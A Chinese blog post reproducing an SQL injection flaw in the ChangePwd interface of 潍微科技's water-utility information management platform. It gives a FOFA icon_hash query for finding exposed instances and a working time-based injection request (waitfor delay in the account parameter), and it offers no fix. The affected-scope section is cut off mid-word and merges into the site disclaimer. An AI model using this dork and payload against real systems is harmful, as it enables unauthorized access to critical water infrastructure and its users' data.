热门标签
热门文章
- 1Hadoop概述及集群搭建
- 2Jetson Orin AGX 上ONNX转换为engine时警告:[W] [TRT] Unknown embedded device detected. Using 59655Mi..._using 59660mib as the allocation cap for memory on
- 3xml格式标签转yolo格式的txt格式标签_xml转yolo
- 4ComfyUI 详细入门基础教程之(二):文生图基础流程
- 5Linux:Failed to connect to github.com port 443: Connection refused_wget github connection refused
- 6Flutter 深入探索混合开发的技术演进_platformviewlink
- 7pytorch gpu版本安装_python 3.8 安装 pytorch gpu
- 8YOLOv7系列改进:ACmix结构的融合——自注意力和卷积的高效集成_yolov7 用acmix了吗
- 9python顺序结构例题_洛谷入门1(顺序结构)
- 10重庆移动面试_重庆移动ai面试问题
当前位置: article > 正文
【漏洞复现】潍微科技-水务信息管理平台 ChangePwd SQL注入漏洞
作者:羊村懒王 | 2024-04-18 07:20:21
赞
踩
【漏洞复现】潍微科技-水务信息管理平台 ChangePwd SQL注入漏洞
0x01 产品简介
潍微科技-水务信息管理平台主要帮助水务企业实现水质状态监测、管网运行监控、水厂安全保障、用水实时监控以及排放有效监管,确保居民安全稳定用水、环境有效保护,全面提升水务管理效率。
0x02 漏洞概述
潍微科技-水务信息管理平台 ChangePwd 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
0x03 测绘语句
fofa: icon_hash="-491165370"0x04 漏洞复现
-
- GET /Account/ChangePwd?oldpwd=123456&newpwd=123456&conpwd=123456&account=1%27;waitfor%20delay%20%270:0:5%27--+ HTTP/1.1
0x05 影响范围
潍微科声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/羊村懒王/article/detail/444661
推荐阅读
相关标签
